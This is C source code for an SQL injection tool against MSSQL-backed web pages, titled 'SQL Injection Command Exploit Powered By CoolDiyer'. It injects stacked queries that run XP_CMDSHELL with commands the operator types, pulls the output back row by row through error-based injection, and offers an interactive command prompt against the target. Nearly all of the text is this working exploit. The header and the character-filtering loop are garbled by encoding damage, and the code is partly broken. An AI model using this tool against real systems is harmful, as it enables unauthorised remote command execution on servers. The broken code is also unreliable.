Sql×¢ÈëSAȨÏÞCMDÖÕ½áÕßCÔ´Âë

char *injurl,*type,*end;
char *GetResult(char *url)
{
£  char buffer[1024*8];
£  DWORD dwBytesRead=0;
£  HINTERNET hNet=InternetOpen("SqlCMD",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
£  HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
£  BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
£  InternetCloseHandle(hUrlFile);
£  InternetCloseHandle(hNet);
£  return buffer;
}
char *ExecCommand(char *cmd)
{
£  char url[1024],buff[1024],result[1024],*response,*p,*p1;
£  int n=1,i,j;
£  memset(url,0,sizeof(url));
£  wsprintf(url,"%s%s;CREATE TABLE [SIC_Tmp]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [SIC_Tmp](ResultTxt) EXEC MASTER..XP_CMDSHELL %s;insert into [SIC_Tmp] values ([g_over])--",injurl,type,cmd);
£  response=GetResult(url);
£  while(1){
£  memset(buff,0,sizeof(buff));
£  memset(result,0,sizeof(result));
£  wsprintf(url,"%s%s and (select top 1 case when ResultTxt is Null then [CoolDiyer][CoolDiyer] else [CoolDiyer]%%2BResultTxt%%2B[CoolDiyer] end from (select top %d id,ResultTxt from [SIC_Tmp] order by [id]) T order by [id] desc)>0%s",injurl,type,n,end);
£  response=GetResult(url);
£  if(p=strstr(response,"[CoolDiyer]"))p1=strstr(p+11,"[CoolDiyer]");
£ £ £  else {
£ £ £ £ £ £ £  puts("Cannt Injection It");
£ £ £ £ £ £ £  return;
£ £ £  }
£  strncpy(buff,p+11,p1-p-11);
£  if (!strcmp(buff,"[g_over]")){
£ £ £  wsprintf(url,"%s%s;DROP TABLE [SIC_Tmp]--",injurl,type);
£ £ £  GetResult(url);
£ £ £  return;
£  }
£  //filter
£  for(i=0,j=0;i£ £ £ £ if(buff==& && buff[i+2]==t && buff[i+3]==;){
£ £ £ £ £  if (buff[i+1]==l)result[j]=<;
£ £ £ £ £  if (buff[i+1]==g)result[j]=>;
£ £ £ £ £  i+=3;
£ £ £  }
£ £ £  else if(buff==& && buff[i+1]==q && buff[i+2]==u && buff[i+3]==o && buff[i+4]==t && buff[i+5]==;){
£ £ £ £ £  result[j]=";
£ £ £ £ £  i+=5;
£ £ £  }
£ £ £ £ £  else result[j]=buff;
£ £ £  }
£  puts(result);
£  memset(url,0,sizeof(url));
£  n++;
£  }
}
void main(int argc,char **argv)
{
£  char cmd[1024];
£ £ £  printf("=[Sql Inj CMD]======================================================\n");
£ £ £  printf("\tSQL Injection Command Exploit Powered By CoolDiyer\n\n");
£ £ £  if(argc!=3){
£ £ £  printf("\tUsage:£ sqlcmd.exe \n");
£ £ £  printf("\t\tType:\t0->Number£ £ 1->char£ £ 2->Search\n");
£ £ £  printf("\tExample:\n\t\tsqlcmd.exe http://localhost/index.asp?id=1 0\n");
£ £ £  printf("=05-12-22===========================================================\n");
£ £ £  return;
£  }
£  injurl=argv[1];
£  if(atoi(argv[2])==0){
£ £ £  type="";
£ £ £  end="";
£  }
£  if(atoi(argv[2])==1){
£ £ £  type="";
£ £ £  end=" and =";
£  }
£  if(atoi(argv[2])==2){
£ £ £  type="%";
£ £ £  end=" and %=";
£  }
£  while (1)
£  {
£  printf("Sql Inj CMD>");
£  gets(cmd);
£  if (!strcmpi(cmd,"exit"))return;
£  ExecCommand(cmd);
£  }
}